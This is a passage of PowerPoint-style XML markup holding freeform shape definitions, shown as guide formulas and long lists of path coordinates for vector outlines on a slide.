                      <a:pt x="419" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="557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81" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3689350" y="1428750"/>
                <a:ext cx="184150" cy="211138"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 226 w 511"/>
                  <a:gd name="T1" fmla="*/ 384 h 585"/>
                  <a:gd name="T2" fmla="*/ 252 w 511"/>
                  <a:gd name="T3" fmla="*/ 426 h 585"/>
                  <a:gd name="T4" fmla="*/ 284 w 511"/>
                  <a:gd name="T5" fmla="*/ 457 h 585"/>
                  <a:gd name="T6" fmla="*/ 315 w 511"/>
                  <a:gd name="T7" fmla="*/ 473 h 585"/>
                  <a:gd name="T8" fmla="*/ 331 w 511"/>
                  <a:gd name="T9" fmla="*/ 473 h 585"/>
                  <a:gd name="T10" fmla="*/ 347 w 511"/>
                  <a:gd name="T11" fmla="*/ 463 h 585"/>
                  <a:gd name="T12" fmla="*/ 373 w 511"/>
                  <a:gd name="T13" fmla="*/ 441 h 585"/>
                  <a:gd name="T14" fmla="*/ 384 w 511"/>
                  <a:gd name="T15" fmla="*/ 415 h 585"/>
                  <a:gd name="T16" fmla="*/ 378 w 511"/>
                  <a:gd name="T17" fmla="*/ 378 h 585"/>
                  <a:gd name="T18" fmla="*/ 478 w 511"/>
                  <a:gd name="T19" fmla="*/ 273 h 585"/>
                  <a:gd name="T20" fmla="*/ 494 w 511"/>
                  <a:gd name="T21" fmla="*/ 316 h 585"/>
                  <a:gd name="T22" fmla="*/ 510 w 511"/>
                  <a:gd name="T23" fmla="*/ 394 h 585"/>
                  <a:gd name="T24" fmla="*/ 504 w 511"/>
                  <a:gd name="T25" fmla="*/ 426 h 585"/>
                  <a:gd name="T26" fmla="*/ 467 w 511"/>
                  <a:gd name="T27" fmla="*/ 494 h 585"/>
                  <a:gd name="T28" fmla="*/ 399 w 511"/>
                  <a:gd name="T29" fmla="*/ 547 h 585"/>
                  <a:gd name="T30" fmla="*/ 363 w 511"/>
                  <a:gd name="T31" fmla="*/ 562 h 585"/>
                  <a:gd name="T32" fmla="*/ 305 w 511"/>
                  <a:gd name="T33" fmla="*/ 584 h 585"/>
                  <a:gd name="T34" fmla="*/ 279 w 511"/>
                  <a:gd name="T35" fmla="*/ 584 h 585"/>
                  <a:gd name="T36" fmla="*/ 231 w 511"/>
                  <a:gd name="T37" fmla="*/ 573 h 585"/>
                  <a:gd name="T38" fmla="*/ 190 w 511"/>
                  <a:gd name="T39" fmla="*/ 557 h 585"/>
                  <a:gd name="T40" fmla="*/ 153 w 511"/>
                  <a:gd name="T41" fmla="*/ 525 h 585"/>
                  <a:gd name="T42" fmla="*/ 121 w 511"/>
                  <a:gd name="T43" fmla="*/ 484 h 585"/>
                  <a:gd name="T44" fmla="*/ 63 w 511"/>
                  <a:gd name="T45" fmla="*/ 394 h 585"/>
                  <a:gd name="T46" fmla="*/ 16 w 511"/>
                  <a:gd name="T47" fmla="*/ 294 h 585"/>
                  <a:gd name="T48" fmla="*/ 6 w 511"/>
                  <a:gd name="T49" fmla="*/ 247 h 585"/>
                  <a:gd name="T50" fmla="*/ 0 w 511"/>
                  <a:gd name="T51" fmla="*/ 200 h 585"/>
                  <a:gd name="T52" fmla="*/ 6 w 511"/>
                  <a:gd name="T53" fmla="*/ 153 h 585"/>
                  <a:gd name="T54" fmla="*/ 26 w 511"/>
                  <a:gd name="T55" fmla="*/ 111 h 585"/>
                  <a:gd name="T56" fmla="*/ 43 w 511"/>
                  <a:gd name="T57" fmla="*/ 90 h 585"/>
                  <a:gd name="T58" fmla="*/ 90 w 511"/>
                  <a:gd name="T59" fmla="*/ 53 h 585"/>
                  <a:gd name="T60" fmla="*/ 116 w 511"/>
                  <a:gd name="T61" fmla="*/ 32 h 585"/>
                  <a:gd name="T62" fmla="*/ 194 w 511"/>
                  <a:gd name="T63" fmla="*/ 0 h 585"/>
                  <a:gd name="T64" fmla="*/ 216 w 511"/>
                  <a:gd name="T65" fmla="*/ 0 h 585"/>
                  <a:gd name="T66" fmla="*/ 300 w 511"/>
                  <a:gd name="T67" fmla="*/ 22 h 585"/>
                  <a:gd name="T68" fmla="*/ 337 w 511"/>
                  <a:gd name="T69" fmla="*/ 48 h 585"/>
                  <a:gd name="T70" fmla="*/ 367 w 511"/>
                  <a:gd name="T71" fmla="*/ 84 h 585"/>
                  <a:gd name="T72" fmla="*/ 436 w 511"/>
                  <a:gd name="T73" fmla="*/ 179 h 585"/>
                  <a:gd name="T74" fmla="*/ 200 w 511"/>
                  <a:gd name="T75" fmla="*/ 347 h 585"/>
                  <a:gd name="T76" fmla="*/ 257 w 511"/>
                  <a:gd name="T77" fmla="*/ 153 h 585"/>
                  <a:gd name="T78" fmla="*/ 242 w 511"/>
                  <a:gd name="T79" fmla="*/ 137 h 585"/>
                  <a:gd name="T80" fmla="*/ 226 w 511"/>
                  <a:gd name="T81" fmla="*/ 121 h 585"/>
                  <a:gd name="T82" fmla="*/ 194 w 511"/>
                  <a:gd name="T83" fmla="*/ 111 h 585"/>
                  <a:gd name="T84" fmla="*/ 179 w 511"/>
                  <a:gd name="T85" fmla="*/ 111 h 585"/>
                  <a:gd name="T86" fmla="*/ 158 w 511"/>
                  <a:gd name="T87" fmla="*/ 121 h 585"/>
                  <a:gd name="T88" fmla="*/ 131 w 511"/>
                  <a:gd name="T89" fmla="*/ 147 h 585"/>
                  <a:gd name="T90" fmla="*/ 126 w 511"/>
                  <a:gd name="T91" fmla="*/ 163 h 585"/>
                  <a:gd name="T92" fmla="*/ 126 w 511"/>
                  <a:gd name="T93" fmla="*/ 179 h 585"/>
                  <a:gd name="T94" fmla="*/ 131 w 511"/>
                  <a:gd name="T95" fmla="*/ 216 h 585"/>
                  <a:gd name="T96" fmla="*/ 163 w 511"/>
                  <a:gd name="T97" fmla="*/ 273 h 585"/>
                  <a:gd name="T98" fmla="*/ 289 w 511"/>
                  <a:gd name="T99" fmla="*/ 200 h 5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11" h="585">
                    <a:moveTo>
                      <a:pt x="226" y="384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="384"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="257" y="153"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="257" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="153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82" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3849688" y="1347788"/>
                <a:ext cx="177800" cy="212725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 257 w 494"/>
                  <a:gd name="T1" fmla="*/ 157 h 589"/>
                  <a:gd name="T2" fmla="*/ 236 w 494"/>
                  <a:gd name="T3" fmla="*/ 126 h 589"/>
                  <a:gd name="T4" fmla="*/ 204 w 494"/>
                  <a:gd name="T5" fmla="*/ 110 h 589"/>
                  <a:gd name="T6" fmla="*/ 188 w 494"/>
                  <a:gd name="T7" fmla="*/ 110 h 589"/>
                  <a:gd name="T8" fmla="*/ 173 w 494"/>
                  <a:gd name="T9" fmla="*/ 115 h 589"/>
                  <a:gd name="T10" fmla="*/ 136 w 494"/>
                  <a:gd name="T11" fmla="*/ 147 h 589"/>
                  <a:gd name="T12" fmla="*/ 131 w 494"/>
                  <a:gd name="T13" fmla="*/ 168 h 589"/>
                  <a:gd name="T14" fmla="*/ 131 w 494"/>
                  <a:gd name="T15" fmla="*/ 189 h 589"/>
                  <a:gd name="T16" fmla="*/ 147 w 494"/>
                  <a:gd name="T17" fmla="*/ 247 h 589"/>
                  <a:gd name="T18" fmla="*/ 178 w 494"/>
                  <a:gd name="T19" fmla="*/ 325 h 589"/>
                  <a:gd name="T20" fmla="*/ 220 w 494"/>
                  <a:gd name="T21" fmla="*/ 404 h 589"/>
                  <a:gd name="T22" fmla="*/ 236 w 494"/>
                  <a:gd name="T23" fmla="*/ 430 h 589"/>
                  <a:gd name="T24" fmla="*/ 257 w 494"/>
                  <a:gd name="T25" fmla="*/ 456 h 589"/>
                  <a:gd name="T26" fmla="*/ 294 w 494"/>
                  <a:gd name="T27" fmla="*/ 478 h 589"/>
                  <a:gd name="T28" fmla="*/ 309 w 494"/>
                  <a:gd name="T29" fmla="*/ 478 h 589"/>
                  <a:gd name="T30" fmla="*/ 331 w 494"/>
                  <a:gd name="T31" fmla="*/ 467 h 589"/>
                  <a:gd name="T32" fmla="*/ 357 w 494"/>
                  <a:gd name="T33" fmla="*/ 446 h 589"/>
                  <a:gd name="T34" fmla="*/ 367 w 494"/>
                  <a:gd name="T35" fmla="*/ 420 h 589"/>
                  <a:gd name="T36" fmla="*/ 367 w 494"/>
                  <a:gd name="T37" fmla="*/ 398 h 589"/>
                  <a:gd name="T38" fmla="*/ 341 w 494"/>
                  <a:gd name="T39" fmla="*/ 320 h 589"/>
                  <a:gd name="T40" fmla="*/ 461 w 494"/>
                  <a:gd name="T41" fmla="*/ 262 h 589"/>
                  <a:gd name="T42" fmla="*/ 493 w 494"/>
                  <a:gd name="T43" fmla="*/ 357 h 589"/>
                  <a:gd name="T44" fmla="*/ 488 w 494"/>
                  <a:gd name="T45" fmla="*/ 435 h 589"/>
                  <a:gd name="T46" fmla="*/ 472 w 494"/>
                  <a:gd name="T47" fmla="*/ 472 h 589"/>
                  <a:gd name="T48" fmla="*/ 414 w 494"/>
                  <a:gd name="T49" fmla="*/ 530 h 589"/>
                  <a:gd name="T50" fmla="*/ 367 w 494"/>
                  <a:gd name="T51" fmla="*/ 556 h 589"/>
                  <a:gd name="T52" fmla="*/ 278 w 494"/>
                  <a:gd name="T53" fmla="*/ 588 h 589"/>
                  <a:gd name="T54" fmla="*/ 236 w 494"/>
                  <a:gd name="T55" fmla="*/ 582 h 589"/>
                  <a:gd name="T56" fmla="*/ 194 w 494"/>
                  <a:gd name="T57" fmla="*/ 572 h 589"/>
                  <a:gd name="T58" fmla="*/ 120 w 494"/>
                  <a:gd name="T59" fmla="*/ 509 h 589"/>
                  <a:gd name="T60" fmla="*/ 84 w 494"/>
                  <a:gd name="T61" fmla="*/ 451 h 589"/>
                  <a:gd name="T62" fmla="*/ 47 w 494"/>
                  <a:gd name="T63" fmla="*/ 383 h 589"/>
                  <a:gd name="T64" fmla="*/ 0 w 494"/>
                  <a:gd name="T65" fmla="*/ 247 h 589"/>
                  <a:gd name="T66" fmla="*/ 0 w 494"/>
                  <a:gd name="T67" fmla="*/ 194 h 589"/>
                  <a:gd name="T68" fmla="*/ 5 w 494"/>
                  <a:gd name="T69" fmla="*/ 147 h 589"/>
                  <a:gd name="T70" fmla="*/ 52 w 494"/>
                  <a:gd name="T71" fmla="*/ 73 h 589"/>
                  <a:gd name="T72" fmla="*/ 84 w 494"/>
                  <a:gd name="T73" fmla="*/ 47 h 589"/>
                  <a:gd name="T74" fmla="*/ 126 w 494"/>
                  <a:gd name="T75" fmla="*/ 21 h 589"/>
                  <a:gd name="T76" fmla="*/ 214 w 494"/>
                  <a:gd name="T77" fmla="*/ 0 h 589"/>
                  <a:gd name="T78" fmla="*/ 288 w 494"/>
                  <a:gd name="T79" fmla="*/ 10 h 589"/>
                  <a:gd name="T80" fmla="*/ 320 w 494"/>
                  <a:gd name="T81" fmla="*/ 31 h 589"/>
                  <a:gd name="T82" fmla="*/ 378 w 494"/>
                  <a:gd name="T83" fmla="*/ 89 h 589"/>
                  <a:gd name="T84" fmla="*/ 278 w 494"/>
                  <a:gd name="T85" fmla="*/ 189 h 589"/>
                  <a:gd name="T86" fmla="*/ 257 w 494"/>
                  <a:gd name="T87" fmla="*/ 157 h 5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94" h="589">
                    <a:moveTo>
                      <a:pt x="257" y="157"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="257" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
